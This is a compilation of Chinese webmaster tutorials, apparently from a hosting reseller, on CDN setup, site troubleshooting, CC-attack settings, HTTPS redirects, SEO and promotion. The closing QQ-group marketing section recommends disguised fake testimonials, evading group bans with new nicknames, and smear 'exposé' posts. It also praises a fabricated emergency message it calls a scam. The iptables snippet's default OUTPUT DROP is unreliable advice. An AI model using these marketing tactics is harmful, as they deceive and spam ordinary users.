点击“添加记录”,记录类型选择CNAME(以CNAME方式接入CDN的域名,无论在CDN里添加何种类型的子域名记录,在域名商这里都要选择CNAME记录类型),主机记录填写子域名(上例中填写 www),记录值粘贴从CDN拷贝的CNAME记录。确定后等待解析生效。更改后48小时内生效,一般过一两个小时就能生效。 四、验证解析是否生效 linux/mac系统您可以通过“终端”APP进行查询;windows系统可以通过Win+R或点击左下角的“开始”按钮打开“开始”菜单,从中打开“运行”,进行查询。 1、以NS接入方式为例 2、以CNAME接入方式为例 如何判断解析是否正确? 如果解析出的IP不是源站IP,则说明解析生效了。或者用curl -I IP 来查看解析的IP是不是归属云加速(Server: yunjiasu-nginx) 至此,域名已成功接入CDN ,用户可通过17ce.com 等站长工具进行访问速度的验证,关于CDN的其他配置参见:https://su.baidu.com/help/index.html#/2_kuaisurumen/1_zhuceyujieru.md 关闭加速 用户在使用过程中,如遇线上调试或特殊情况需要关闭加速,可以针对主域或子域关闭加速。 一、子域单独关闭: 二、主域关闭,访问回源: 另外,还可通过打开「实时同步」来实现过节点但不加速的效果,所有请求都会实时回源,对线上调试问题十分方便。 常见问题解析      配置生效后,即可打开网站查看访问情况,此过程可能遇到因配置等问题返回的一系列状态码,小编就常见的状态码进行解析。 一、Error1001网站配置未生效,访问提示1001错误主要有以下原因 刚刚在百度云加速添加的域名,云加速需要几十秒的时间同步到节点配置中,稍等片刻刷新页面即可解决。 当前节点没有您网站的相关(回源)配置,请登录云加速检查该条解析是否已经正确配置,查看您域名的状态是否是激活完成。 域名无备案。 二、Error1016网站配置未生效,访问提示1016错误主要有以下原因 网站子域名配置问题,子域名未添加、刚刚删除或设置有误; 在云加速中已删除域名,但本地localDNS还解析到云加速节点,因域名已删除CDN节点无配置导致。 如出现1016错误提示,请检查对应子域名配置是否正确;如您需要删除云加速中添加的域名,请在确保您网站域名解析已经全部解析到您当前域名服务商的配置后再删除(通常全球解析完成更新需要48-72小时)。 三、常见的“5XX”故障代码含义 这类状态码代表了服务器在处理请求的过程中有错误或者异常状态发生,也有可能是服务器意识到以当前的软硬件资源无法完成对请求的处理。 500:多见服务器返回,服务器错误 502:网关回源超时 520:web server返回了一个未知的错误,该错误大多数为以下几种情况:1)回源连接被reset,多数是防火墙拦截 。 2)http头信息超过了云加速设定的大小。3)回源请求成功,但是返回了一个空值。4)源站存在错误的http响应 当用户在使用过程中出现了以上报错,请按照以上解决方案进行初步解决,如果在此过程中遇到阻断性问题,可联系云加速企业QQ:4008768800,由云加速技术支持为您提供服务 #### 如何快速查询“网站打不开”原因并解决 为了让大家更高效快速的应对“网站为啥打不开了”这个问题,今天我们就来破解下:网站打不开的原因有哪些?如何快速寻求解决方案?一、网站由哪些要素组成?为了方便大家理解,以小编坐公交车去朋友家为例:域名:朋友家地址上的门牌号解析:查询导航定位朋友家位置DNS:百度/高德地图负责帮我找位置劫持:等公交车时被推销坐了黑车,最后去了错误的地方网络线路:搜索位置后,我决定坐什么线路的公交车中继路由节点:到我朋友家需要经过各个车站cdn:备用线路,人行天桥机房:朋友家的楼盘服务器:云服务器=土豪朋友的独栋别墅             虚拟主机=某小区的某套房IP地址:朋友家所在的经纬度,不容易记住但很重要,类似14.215.177.38这串数字网站程序:朋友家买的家具家电,用的装修风格二、网站打不开的常见原因网站访问流程图(红色部分为关键步骤): 1.解析不生效=朋友家地址在地图上尚未更新,暂时无法通过地图搜索出来这就是说:域名解析并非添加后就会立即生效,解析不生效就会让域名找不到服务器,这样就会造成网站打不开。解析长时间无法生效或不对,需要联系域名提供商或者dns提供商协助排查。目前解析不生效有以下原因:(1)域名状态不对;(2)未实名;(3)运营商的dns还没刷新排查方法:ping ping ping重要的事情说三次!打开windows开始菜单,点击运行(windows10系统可以直接按键盘上的win键+R),输入cmd回车 打开的一个黑乎乎的窗口,输入ping,空一格,接域名然后回车,下面的情况,只要出现了IP,不管通不通,都表示解析出IP了。注意这里多说一点,很多朋友认为不通就无法访问,是不正确的,控制ping返回值的icmp协议和网站访问的http协议是两个不同的东西哦。 如果是如下所示情况,则表示解析不到域名:解决方案:需要检查域名状态和域名解析是否正确,如果正确需要等待解析生效: 如果解析长时间不生效,可以进行dns缓存清理,解决方案:在cmd中,输入ipconfig /flushdns回车 2 .解析错误=粗心的我输入了错误的地址,地图上始终搜索不出位置不管写错了服务器地址还是写错了解析的主机名,都会导致无法用域名找到正确的服务器地址。还有一些极端的情况是域名被劫持,这跟本地网络运营商DNS服务器被攻击或者本地电脑的host文件被篡改有关。如果判断为劫持:排查方法:更换网络或使用不同设备访问测试解决方案:更换本地dns,联系网络供应商(电信、联通、移动)3.线路或中继路由异常=去朋友家的必经之路因施工中断,需要绕道或通过人行天桥比较常见于跨网络访问,比如移动用户访问电信和联通的服务器。由于中间某些关键的路由节点故障。特征是是其他地区能访问,或者其他网络能访问,只有自己访问不到,解析什么的都正确。排查方法:使用和ping相同的方法,打开cmd后输入tracert -d 域名,这步叫做跟路由,也就是检查访问网站时候每个路由节点是否正常。如下图所示,最终我们是到达了61.139.126.229这个IP,和我们ping出的IP一致。如果在中间某处出现了中断,如182.140.229.38处以下就全部请求超时,则表示在这个路由处断掉了。解决方案:重启本地路由器或者光猫,借助其他线路或者cdn,或者联系网络供应商(打电话给市政施工单位)  4.服务器故障=朋友家附近大面积停电或单个跳闸,需联系物业处理排查方法:若该地区所有网络都打不开,属于服务器大片故障;单台云主机若远程和网络均测试正常,则表明服务器内部出现故障。解决方案:建议联系服务器提供商(开发商/物业)协助排查。5.程序错误=朋友家的装修一言难尽,沙发太差,地板也气泡了...排查方法:若解析无误,访问出现401,403,404,500或者程序的代码报错,都属于服务器内错误解决方案:需要找程序开发人员(装修人员),也可联系服务器提供商协助排查。三、如何联系服务器供应商解决问题1)可自行解决的问题:如遇因上述1、2、3原因而导致的网站打不开,可自行解决或联系网络供应商2)需服务器供应商解决的问题:如遇因上述4、5原因而导致的网站打不开,可联系服务器供应商协助处理 #### 如何快速的使用百度云加速防御CC攻击 最近有遇到一位客户自行在官方购买的,由于不会操作联系到主机吧咨询CC防御问题,因为这位客户接入已经有两个小时了,但是防御效果依然不给力,这里主机吧来给大家说下,如何快速度防御CC攻击。 1.使用cname别名接入 因为cname不需要更换DNS到百度,所以域名解析生效快,一般半小时左右全部地区生效,非常适合网站正在被攻击的用户使用。 2.开启强力防护模式 进入安全功能-ADS-CC防护:开启强力防护模式,强力防护模式可以拦截99.9%的攻击,对防御CC攻击不是问题。 3.调低安全验证有效期时间 进入安全功能-WAF- 安全验证有效期:调为15分钟或者5分钟。如果对方代理IP比较多,调低安全验证有效时间减少服务器的压力,对CC防御更有效。 4.开启浏览器检查 进入进入安全功能-WAF- 开启浏览器检查,一些攻击是通过模拟搜索蜘蛛抓取来影响服务器CPU的稳定性,开启浏览器检查可以拦截非浏览器的访问。 5.更换服务器IP 如果以上方法还没有效,那么可能是我们的服务器IP暴露了,黑客是直接通过IP请求回源的,并没有经过百度云加速,那么解决办法只有一个,更换一个新服务器IP,然后用百度云加速隐藏起来即可。   #### 如何打造一个高权重的网站 要创建一个具有高权重的网站,您需要注意以下几个方面: 高质量的内容:创建高质量的内容是非常重要的,这意味着您需要投入时间和精力来编写文章、制作视频或设计图像等。确保您的内容独特、有价值、易于阅读,并且涵盖您网站的核心主题。 SEO优化:确保您的网站是按照搜索引擎优化的标准来构建的,包括使用关键字、元标记和链接结构等。这将有助于您的网站在搜索引擎结果页上获得更高的排名。 反向链接:建立高质量的反向链接也是很重要的。这将有助于增加您网站的权威性和可信度,从而提高您的排名。 用户体验:确保您的网站易于使用、快速加载、视觉上吸引人,并提供优秀的用户体验。这将有助于留住访问者并提高您的网站的转化率。 社交媒体:积极利用社交媒体来推广您的网站,增加流量和知名度。您可以使用微博、小红书、知呼等社交媒体来与潜在的客户互动,并在您的网站上添加社交媒体共享按钮,以便访问者可以方便地与您的内容互动。 分享和协作:与其他网站协作和分享内容也可以增加您的网站的权威性和可信度。这可以包括媒体合作、嘉宾文章、引用和其他形式的协作。 通过实践这些方法,您可以创建一个高质量、高权威的网站,从而提高您的在线存在感和吸引力。 #### 如何把“http”自动跳转“https” 将HTTP自动重定向到HTTPS的方法可以通过在服务器上进行以下配置实现: 安装SSL证书:首先,你需要在你的服务器上安装SSL证书 配置服务器:配置服务器以自动将HTTP请求重定向到HTTPS。下面是一些常见的服务器配置示例: Apache服务器:在Apache的虚拟主机配置中,你可以添加以下重定向规则: RewriteEngine On RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] Nginx服务器:在Nginx的虚拟主机配置中,你可以添加以下重定向规则: server { listen 80; server_name example.com; return 301 https://$server_name$request_uri; } IIS服务器:在IIS的站点配置中,你可以添加以下重定向规则: <rewrite> <rules> <rule name="HTTP to HTTPS redirect" stopProcessing="true"> <match url="(.*)" /> <conditions> <add input="{HTTPS}" pattern="off" /> </conditions> <action type="Redirect" redirectType="Permanent" url="https://{HTTP_HOST}/{R:1}" /> </rule> </rules> </rewrite> 以上是一些常见的服务器配置示例,不同的服务器和操作系统可能有不同的配置方式,具体配置方法请参考相应的官方文档。 通过将HTTP请求自动重定向到HTTPS,可以提高网站的安全性,并确保所有用户都能以安全的方式访问网站。 #### 如何把本地电脑的东西复制粘贴到VPS云服务器 最近有不少朋友问怎么把本地电脑上的东西上传到vps上这个问题,其实把本地电脑上的东西拷贝到vps上并不难,下面是具体的图文教程,希望能给您带来帮助。 先在本地电脑远程登陆mstsc登录VSP 具体流程:在本地电脑上点击 开始—运行输入“mstsc”,然后点击选项,点击本地资源后,出现如下界面   点击详细信息,将驱动器前面的对号打上, 点击确定,然后返回到常规选项上,输入VPS云服务器IP帐户登陆后,就可以在本地电脑上在远程连接一个VPS云服务器 上去VPS后,我们打开我的电脑,就会发现,下面挂载了本地电脑的硬盘,接下来就开始将数据直接拷贝到VPS云服务器上就可以了。 #### 如何把百度云加速SSL证书下配置至宝塔面板教学 最近一直有站长咨询这个问题。那就是域名本身在百度申请了SSL证书,然后想配置到宝塔面板上。 今天我们就来做个教程,教大家怎么配置。 首先当然是进入百度云加速 证书列表 更多,下载 随便输入个密码,确定 压缩包解压,输入刚才输入的密码 解压得到 XXX.COM.cer*文件,这是一个SSL证书文件,用记事本打开,复制-----BEGIN RSA PRIVATE KEY----- 以上部分 进入宝塔网站SSL设置,粘贴到证书框里 把-----BEGIN RSA PRIVATE KEY-----到底部的-----END RSA PRIVATE KEY----- 内容复制到密钥框里 保存即可完成。 #### 如何把网站资源缓存至百度云加速节点 经常有站长反馈说,网站使用了百度云加速后,速度并没有快多少,今天我们来说下这个问题,百度云加速本质上是一个CDN,CDN的原理很简单,就是把网站的资源缓存至CDN的边缘节点,当用户访问网站的时候,CDN就会直接把缓存在节点上的资源转发给用户,而不需要再请求回源服务器,达到加速的作用。 而CDN缓存是只针对网页的静态资源的,对于那些动态资源是不会进行缓存的,像PHP这些后缀的url地址百度云加速是不会缓存的,当然这并不代表动态网站使用百度云加速后,达不到加速的效果,如果你PHP网页上图片较多的,使用百度云加速后,一样可以达到加速效果,因为加载PHP网页的时候,里面的图片文件是有缓存的。 想要达到更快,我们需要尽可能的将您网站资源让百度云加速节点进行缓存, 百度云加速目前默认的静态缓存格式包含以下后缀:css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如果您需要缓存的内容不在默认配置中,您需要点击域名右边的下拉菜单进入特定页面规则中进行额外的缓存规则配置,里面有配置方法的详细说明,可以参考。 对于动态资源我们尽量不要做缓存,因为可能会影响你的网站功能正常使用。 #### 如何接入百度云加速?百度云加速网站NS接入视频教学 URL: https://www.zhujib.com/ruhejierubaiduyunjiasubaiduyunjiasuwangzhannsjierushipinjiaoxue.html #### 如何推广网站 一些实用的推广方法 经常会看见很多做网站运营的朋友咨询如何推广网站,大多数咨询这类问题的都是新人,今天主机吧整理了一些比较实用的网站推方法,大家可以根据个人的需求和操作习惯来选择合适的推广方法。为什么要推广网站,无论是企业网站还是个人网站,都需要把网站推广出去,对企业来说可以带来更多的客户,对个人来说可以让更多人了解你的兴趣,增加网站访问也可以卖点东西或放置广告带来收入。很多网站新手存在一个错误的理解,认为只要把网站建起来了,就会有人访问有人来看。简单列举一下:你公司印刷了很多宣传手册,你没有发给客户,那么客户是不知道手册里有什么内容的,只要你把这些宣传手册发给客户,客户看见了。相对来说就取到了宣传和推广的作用。同样的道理,你有了网站不如推广完全没有价值的。     网站建设成功了我们还需要花大量的精力去学去网站推广,而网站推广却是成功网站的最重要的一倍份。本篇文章我们针对于如何推广网站问题,提供一些日常的推广小技巧供大家学习阅读。     1、让搜索引擎知道你的网站 在网站推广中,首先要让百度、谷歌等搜索引擎知道你的网站,并收录你的网站。如何让搜索引擎知道自己的网站其实方法很简单,就是主动向搜索引擎提交你的网站地址,是企业主和网站建设人员建网站所必须解决的问题之一。 国内各大搜索引擎都是有针对网站提交链接的入口,只要网站符合收录条件,一般提交1个月内都会收录并在搜索引擎中可以查到你的网页,具体链接大家可以百度一下:搜索引擎网站提交入口 2、如何免费推广自己的网站 其实免费推广的方法很多,比如在大型论坛和博客站点发布一些文章或者评论留上你的URL地址,还可以到信息发布类网站百度贴吧、百度百科、互动百科、搜搜搜吧、赶集网、58同城等发布您的企业信息,同时注明你网站站的链接,这样对于百度等搜索引擎的收录,同样有很大的价值。目前这种方法适合新站收录问题,想真正的将关键词排名做的很好,还是需要优化很多相关的细节。 3、付费推广 付费推广相对来说成本很高,这个根据自身的条件来进行推广了。 A、竞价推广,通过百度开通竞价推广账户,设置关键词就可以开始推广了,又被称为广告推广和广告投放。 B、购买外链,网站建设完成后,你可以适当的花钱购买一些PR值高网站的单向链接,这种方法可以促进心中一寒收录。 C、搜索引擎推广,简称为SEO关键词优化,这里就不用详细介绍了。SEO推广可以通过百度、谷歌、搜搜、搜狗等搜索引擎获取关键词排名。 4、回答推广方法 可以利用一些知识类的站点,例如百度知道,360知道,新浪问答,搜索问答,回答别人的问题或是自我提问。 5、百科推广方法 百科比较权威的站点,可以通过百度百科,互动百科,知识百科等增加网站内容,增加品牌词曝光率。 6、分类信息推广方法 这种推广方法被很多人常用,他们都会去58,赶集网,百姓网,地方分类信息网站上发布自己的企业信息和产品信息。 7、QQ群推广方法 QQ群推广方法从以前到现在也是一个非常好的网站推广方法,QQ拥有很大的活跃用户,你把自己的网站和信息发到QQ群,当然发的时候还是需要一些技巧,要不然很容易适得其反,具体操作流程网上有很多教学,这里就不多说了。 8、图片水印推广方法 我们在发布内容的时候,或者看见一些好看好玩的图片时,在图上增加你的文字水印或者网址水印,然后在发布在QQ群,QQ群会有很多人把这些图片进行转发,起到很好的宣传效果。或者微信朋友圈,你会发现有部分人会去搜索访问你的这个网站。不管你信不信,反正我已经用实际案例证明了。 9、软文推广方法 写一些文章或引用一些好的文章,巧妙的加入您在好推建站的网站URL。要是你的这篇文章被多人转载,那么会有更多的网民看见你的网站地址,取到了很好的传播和推广效果。 10、博客推广方法 自己搭建一个博客,上面写一些相关的文章,等博客站有排名之后,可以适当的带点锚文本链接。自己没有成本的话,可以通过一些优质一点的博客发布评论,评论中带上你的网站地址,这种方法对于新站有一点点的效果。 11、论坛发帖推广方法 可以到相关行业知名论坛论坛进行发布帖子,切记,在注册的时候,把签名改为你的网站地址。 12、微博推广方法 借助博客平台发布相关内容或者分享文章,把你网站的文章,产品发布到各大微博中,可以免费获得曝光率。 13、签名推广方法 咱们经常使用的到QQ,MSN,旺旺聊天工具等,上面都可以把签名改为你的名称和网址。可以免费的获得一些曝光量。一些特殊行业就是通过QQ签名推广的,流量很高哦。 14、名片、宣传页推广方法 在你的名片上和宣传页中增加上你的网站,客户收到你的名片后,敢兴趣他会访问你的网站了解更多内容的, 15、交换友情链接推广方法 有友情链接交互从以前到现在都是一种非常可靠的推广方法,根据自己所在的行业,找一些相关的网站进行链接交换。 16、购买相关行业网站广告位 一些知名的网站流量很高,就会出售网页上的某个广告位置来增加收益,像就我们平时看到的广告牌似的,有人看到了你在这个网站挂的广告位后,就会点击进入,给网站带来流量。 17、发布兼职推广方法 去兼职网发布兼职任务,任务中带上你的信息和网站,不仅能够吸引一些人群,才能有效的取到推广效果。 18、发布任务推广方法 可以在威客网发布任务,不仅能够吸引接受任务的人,而且能够吸引一大批旁观者。要充分利用方式进行有效传播。 19、招聘推广方法 找一些人才招聘网,上面发布一些相关招聘信息,带上你的信息和网站,同样会增加曝光率。 20、口碑推广方法 把站内的内容完善好,让用户喜欢的网站,帮助你进行传播。 21、邮件推广方法 可以找一些邮箱或是QQ群邮件营销,把你的内容加上你的网址,进行群发。 22、搜索引擎推广方法 这是目前最常见的操作手法,也是很多新手站长需要学习的网站推广方法,虽然周期有点漫长,后期取得排名之后可以免费获得更多的资源信息。这种方法被称为搜索引擎优化(简称SEO),SEO推广也是成本最低的一种推广手段。通过搜索引擎算法,想要蜘蛛快速抓取我们的网站,特别是新站,首先向各大搜索引擎提交网址。然后提高网站更新频率,每天定期更新文章内容,当蜘蛛喜欢你的网站。在每个单独的页面增加单独的关键词,在进行关键词优化,这样避免关键词堆积,页面关键词重复等现象。坚持写原创内容,根据百度搜索引擎实算法规则,原创内容更能让蜘蛛喜欢你的网站,网站坚持更新原创内容,把用户体验做好,才有助于SEO优化,搜索引擎才会给你带来更多流量。 #### 如何提高百度云加速CDN命中率 提高网站访问速度方法 最近主机吧有位客户反馈说网站接入百度云加速后,并没有感觉到明显的加速效果,查看报表的时候,加速流量只有一点点,CDN缓存命中率非常低。 针对这个问题,我们对客户网站进行了观察,发现用户的网站每次打开都是会请求很多的JS、CSS文件,而这些文件又是都是带参数的,如下图: 查询发现这些带参数的文件有些并没有命中百度云加速CDN缓存,这就无形中带慢了网站访问速度了。为什么会出现这个问题呢? 原因是百度云加速-CDN加速设置里,该用户在选择缓存粒度设置 的时候,选了细致选项,这个选项并不适合该用户的网站,因为他的网站链接几乎都是带参数的,选择细致的话会导致有些链接根本不会进行缓存。 我们要做的是把缓存粒度选为:简单 简单:可以缓存带参数的静态文件,会忽略参数 选择完后,我们再通过浏览器缓存查看下,发现那些带参数的文件都命中缓存了,整体打开速度提高了一半。 如果你的网站也是JS 、css、图片文件都是带参数的,不防试试吧。 需要注意的,百度云加速默认缓存以下后缀的文件: css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如果你的网站有些不在以上文件的,需要单独缓存的,可以通过「特定页面规则」来实现,点击“查看报表”旁边的下拉菜单,点击「特定页面规则」,在规则自定义页面可通过规则来设置需要缓存的页面,目录及文件类型。 好了,以上就是一些提供百度云加速CDN命中率的小技巧了,很简单,如果有同学不懂的,也可以咨询主机吧,另外需要百度云加速收费版的也可以联系我,价格优惠。 #### 如何提高百度云加速流量(增加CDN缓存命中率) 经常有站长使用百度云加速后,遇到一个问题,往往网站使用总流量比加速流量多得多,比如下图这个: 报表上可以明显的看到总流量远比加速流量高得多,这是为何呢? 其实我们可以把加速流量当成是节点缓存的流量,而总流量是指网站全部内容分发的流量总和。 想要提高CDN百度云加速的加速流量指标,其实就是提高缓存流量。而百度云加速默认缓存网页后缀为: css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 除了上述文件后缀,还有哪些情况,文件不会被缓存? 如果你的文件设置的cache-control是“private”、”no-store”、”no-cache”、”maxage=0”或者在响应里面存储cookie,云加速都将无法缓存;单个文件如果大于100M(商务版200M、企业版500M)也将不会被缓存。 那么假如你的网站有其它类似的文件,比如zip、MP4、MP3等其它格式的文件,可以通过自定义规则来设置缓存,通过规则自定义功能可以很容易的设置需要缓存的页面,目录及文件类型。 点击“查看报表”旁边的下拉菜单,点击“规则自定义”即可进入添加。 #### 如何提高百度熊掌号指数 现在很多企业或者站长会说,主机吧也申请了熊掌号,数据提交也在积极提交,可是指数有时增加有时减分,增长非常慢,有没有捷径可以快速提升熊掌号搜索指数呢? 这里,我们就和站长们一起盘点熊掌号搜索指数、提升熊掌号搜索指数的关键点吧! 首先,我们先了解什么是熊掌号搜索指数?熊掌号搜索指数总分不设上限(0~99分为新手期),由内容价值分、用户价值分与平台任务分三个维度的得分加权得出,分值越高说明熊掌号在对应维度的表现越优异。 熊掌号内容价值分的计算方式 内容层面,熊掌号创作发布内容的质量越高、原创内容数量越多、页面体验越流畅、领域专注度越高,得分越高。发布广告推广、色情低俗、暴力血腥、政治谣言等违规内容,或有违反平台规范的行为,都会导致分数降低。 注意:提交成功并完成收录的内容累积满10条,开始计算内容价值分; 内容质量:内容层面,所创作内容的质量越高、发布数量越多,得分就越高。发布反动、色情低俗、暴力血腥、政治谣言、广告、虚假宣传等违规内容,都会导致分数降低。 页面体验:体验层面,需遵守《熊掌号落地页体验规范》 ,页面体验越好得分越高,如广告少且不干扰、交互便捷流畅、功能简单易用、页面美观布局合理,反之会导致分数降低。 原创能力:发布的原创内容越多,数量占比越高,原创能力维度得分就越高。反之,抄袭他人的创作会导致得分降低。通过 原创接口提交 的内容,才能参与原创能力评价。 领域专注:发布内容所属领域越专注,在特定领域发布数量越多,分数越高。 熊掌号用户价值分的计算方式 用户价值分由品牌曝光、主动触达、用户沉淀、用户运营这四个部分构成。 品牌曝光:搜索流量中的品牌宣传曝光,用户对某一熊掌号的主动搜索可以提高该熊掌号的品牌曝光得分。品牌标识在搜索结果中的露出次数和落地页的浏览量越高,品牌曝光得分就越高。 主动触达:考量一段时期内用户主动访问熊掌号并进行互动的情况,用户越加主动访问号主页、留言和发消息,主动触达得分越高。 用户沉淀:考核粉丝规模和粉丝增长情况,杜绝僵尸粉/垃圾粉等作弊行为,如经发现将会面临处罚,从而导致分数的降低。 用户运营:通过各种手段唤醒和促活用户,如每周定期对用户群发消息、积极回复用户留言、开展运营活动等,触达用户次数和用户量越多,主动触达得分越高。 熊掌号平台任务分的计算方式 完成任务即可获得指数加分,平台任务会不定期增加更新,请持续保持关注。 #### 如何搭建 snor + iptables 小型防御 DDOS 要搭建 Snort 和 iptables 的小型防御 DDOS,可以按照以下步骤进行: 安装 Snort 在 Linux 系统中使用以下命令安装 Snort: sudo apt-get install snort 配置 Snort 配置 Snort 可以在 /etc/snort/snort.conf 文件中完成。该文件包含许多 Snort 规则,可帮助您检测和阻止各种网络攻击。您可以编辑该文件以启用或禁用某些规则,以便更好地适应您的网络安全需求。 安装 iptables 在 Linux 系统中使用以下命令安装 iptables: sudo apt-get install iptables 配置 iptables 使用以下命令将 iptables 的默认策略设置为 DROP: sudo iptables -P INPUT DROP sudo iptables -P FORWARD DROP sudo iptables -P OUTPUT DROP 此外,您还可以使用以下命令设置 iptables 规则,以允许特定的 IP 地址或端口通过: sudo iptables -A INPUT -s <IP_ADDRESS> -j ACCEPT sudo iptables -A OUTPUT -d <IP_ADDRESS> -j ACCEPT sudo iptables -A INPUT -p tcp --dport <PORT_NUMBER> -j ACCEPT sudo iptables -A OUTPUT -p tcp --sport <PORT_NUMBER> -j ACCEPT 启用防火墙和 Snort 一旦您完成了 Snort 和 iptables 的配置,您需要启用它们以开始防御 DDOS 攻击。您可以使用以下命令启用防火墙和 Snort: sudo service iptables start sudo service snort start 注意,这只是一个简单的示例,以帮助您入门。防御 DDOS 攻击是一个复杂的过程,需要更多的配置和优化。建议您在启用防御措施之前详细了解如何使用 Snort 和 iptables 进行防御。 #### 如何更新dns缓存 清除dns缓存的方法 平时大家在用电脑上网的时候,偶尔会遇到突然上不了网页的情况,或者是能上去QQ但网页打不开的情况,对于这种情况很多时候是由于dns缓存延时导致的。或者我们做网站的时候,域名更换解析了,但本地电脑显示还是原来的IP,又不想强制解析IP,那么我们就需要更新dns缓存。那么如何更新dns缓存呢?最常用的方法就是使用更新dns缓存命令来完成,下面主机吧就给大家详细介绍下该方法。 1、首先要调出电脑的命令对话框,直接使用快捷键:Windows + R键,打开运行操作框,然后在打开后面输入 cmd ,然后点击确定即可进入命令窗口。 2、清空DNS缓存命令为:ipconfig/flushdns,我们需要在如上图所示的命令框中输入此命令,如下图: 3、输入完命令之后,按下电脑键盘上的回车键(Enter)即可开始清空DNS缓存了,如下图所示: 通过以上简单3步,我们就已经成功的完成DNS缓存清理了。 需要更新缓存的时候: 1 本地DNS无法正常解析网址域名IP的时候 2 网站需要及时更新解析IP时候 如果更新缓存网站还无法打的,可能原因: 1 网站服务器故障,解决办法请联系网络服务商 2 域名本身解析问题,请检查域名是否正常解析服务器IP,并绑定服务器 3 本地电脑的DNS本身故障,请更新本地DNS #### 如何有效做QQ群营销 QQ群营销发广告的精髓就三点,私聊、讨论组和群邮件 私聊的好处:产生信任、单独交流、有问题直接回答; 讨论组的好处:强制广告但这个不能信任度; 群邮件的好处:就是发一封邮件群里的所有人都能看到; qq群营销方法分以下四个步骤:寻找目标QQ群,加入目标QQ群,套近乎、做潜伏,发广告。 1.寻找目标QQ群 1)根据关键字在QQ群搜索或者类似于百度这种搜索引擎里搜索 “目标群”,比如:健康群,养生群,保健群,广州健康群等 。 2) 根据群人数、群活跃度、地域进行筛选,活跃度不高的群说明群成员对群感情不深,信任度也不深;相同区域的群成员可以举办线上线下的活动进行推广宣传。 3) 验证消息要真诚带有感情色彩,与群主题相关。 4) 加群是一件枯燥的事,也常会遇到拒绝,遇到拒绝但是又必须加入可以隔天换个昵称或者号码重新加入,保持天天有群加 。 5) 渗透群与群主进行互助合作,同时可以与群活跃成员成为好友互助互利。 2.聊天建立信任关系,进行推广和宣传以及营销 很多人在QQ群中发私聊,发讨论组,发群邮件都没有人回复,这很正常,千万不要盲目去行事,需要具备一套QQ群营销话术。 1)发广告 现在QQ群里面到处都能看到发广告的,大家都反感。那就要掌握几种好的推广技巧。 推广技巧核心:先求感情,在追效果。所以QQ推广是一个长久的战斗,感情这东西不是一天两天培养出来的。 少发、精发:现在的QQ推广的硬性广告是越来越多了,大家也就开始了反感。因为也就出来了软文推广或者植入性广告。比如做自然拥有的减肥交流群:最近一段时间我特别的开心,减了好几斤。是我妈给我买的,好像是叫巴西阿萨伊减肥胶囊,效果挺好的。大家交流1分钟后:哦,对,这个是减肥膳食营养品,是这个网站,大伙看看。很自然的一个流程,这种软性的隐蔽广告,不仅受欢迎,而且还会热议。 利用群公告、群共享、群空间:在群公告那一栏,会有一个图片显示的,这个地方是最新上传的图片到空间上,你完全可以利用这个技巧,不过要你持续关注群。另外自己的群共享当中放一些自己的分享资料,这个就是要让你自己持续不断的关注他。 依照上述方法,加入几十个上百个群,设定好周一到周日,每天该哪几个群发广告,就去发,这样每天都能发,一百个群的话,按平均100人来算,长期下去,就会得到很多认同。 2)发邮件 这个群邮件也是一个很好的方法,免费的邮件不仅可以通知到人,而且转化率还高。但每天发不要超过7-8个群就可以了,不会让人反感 3.QQ群营销的方式 在QQ群里,赤裸裸的广告轰炸,并不能获得好的营销效果,QQ群营销更需要一种曲径通幽的方式。 1)“守株待兔”式 “守株待兔”式其实就是直接把自己的群名片改成广告信息,在群名片中把自己的姓名、业务、联系方式、公司介绍等填写准确。 2)“QQ表情”式 QQ表情是大家经常使用的,一个很有趣的QQ表情,上面挂着一个网址。但是不是每一个QQ表情都可以做营销的,要是一个QQ表情别人看了觉得没什么意义,他就不会收藏、转发你的表情。所以,一个QQ表情确实很有趣,很有意思才能拿来营销,就像上面那个一样,明知道有网址,还是让人忍不住要转发。 3)“助人为乐”式 “助人为乐”式是指平时在群里积极地回答别人的问题,尽可能地帮助别人。坚持一段时间下来,相信不仅会让对方记住了你,还会对你产生好感,当信任产生,有什么是不可能的呢? 4)“转发”式 有段时间,QQ群上经常流传着这样一则信息:“某某家里人重病,正在XX医院做手术,家里人想见他最后一面,让他速回来,有知情者请联系他舅舅,电话:131XXXXXX。爱心接力,大家帮转!”这则信息里面,出现了XX医院,这是营销点所在。后来得知这其实是个营销骗局,不得不佩服这则信息始作佣者的厉害。信息直接出现姓名、电话,显得真实,让人找不到疑点,然后利用人们的同情心理,转发一下也很容易,你看到这种信息的频率证明了它被转发了有N多次。 5)“揭密”式 这种方式,可能是以文字的形式出现,也可以是图片的形式传播,其内容都是揭示一些内幕性的内容,很吸引人眼球,达到打击竞争对手、正面宣传自己的目的。由于它的内容能让人警醒,会让人情不自禁地帮它转发。 营销靠的是创意,无论是网络营销还是实体营销,好创意才能带来好的营销效果。 4.群沟通方式 一个安静如水的群,发挥不出作用,群发广告,除了天时地利人和,重点是广告定位与广告技巧,当广告发到让别人感觉不像是广告而是诱惑的时候,就是最高境界。 学习群可以做讨论、培训形式,产品群可以定期提供活动推广产品,服务群则可以提供服务资讯,交友群则需要创造良好的交友氛围……采用的方法需要根据群的特点来进行。 定期组织相关话题讨论,话题起初开展都会有不顺利的时候,但是长期坚持下去,让群众形成习惯,慢慢就有一定的人气。 进群后除看群名片外,还可以看一下群之前的聊天记录,共享文件,群活动,这样对群有比较初步的了解。 进群很重要的是获取一些群的信息,对自己的专业及业务开展都有好处,比如群通讯录,分类整理到自己联系列表中,可以下载群里面共享的对自己有用的资料,可以从历史聊天记录中寻找与自己业务相关的群成员。 群发言时掌握好时机,如果群里的话题自己刚好很熟悉,就发表自己专业的见解或 